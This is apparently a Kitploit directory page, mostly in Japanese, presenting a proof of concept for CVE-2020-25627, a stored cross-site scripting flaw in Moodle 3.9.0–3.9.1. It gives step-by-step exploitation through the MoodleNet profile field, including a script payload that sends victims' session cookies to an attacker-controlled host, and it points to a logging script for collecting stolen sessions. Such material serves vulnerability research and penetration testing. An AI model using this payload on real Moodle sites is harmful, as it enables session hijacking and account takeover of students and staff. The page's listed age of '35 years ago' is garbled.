Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-25627 — ユーザープロフィール内のmoodlenetprofileパラメータを介した格納型XSS | Kitploit
ツール/GitHubGitHub/hoangkien1020/cve-2020-25627
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubhoangkien1020/cve-2020-25627

CVE-2020-25627

ユーザープロフィール内のmoodlenetprofileパラメータを介した格納型XSS

リポジトリを見る
35年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-25627

ユーザープロフィールのmoodlenetprofileパラメータを介した格納型XSS

このCVEに関する私のPoC

ユーザーの要件: 学生(または登録が可能なサイト)

moodlenetprofileでのXSS

root@kitploit:~
Step 1: Log in with an authenticated user (Can register or through creating a new user without assigning roles )

Step 2: Quick access to Edit profile

domain/moodle/user/edit.php?id=<your user_id>&returnto=profile

In MoodleNet profile, add the script as:

<script>alert("HK")</script>

And save:

Step 3: Anytime, the other user goes to view your profile, the stored XSS will trigger.

Steal cookie via script:

<script>var i=new Image;i.src="http://192.168.0.238/xss.php?"+document.cookie;</script>

Change your domain and upload xss.php to your host:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Done. You can view log.txt to get Moodle session.

moodlenetprofileパラメータ

影響を受けるバージョン: 3.9.0、3.9.1

ソース

https://moodle.org/mod/forum/discuss.php?d=410839

XSSの影響(Cookieの窃取など)は、こちらを参照:

https://github.com/HoangKien1020/pentest/tree/master/XSS

ツールをダウンロード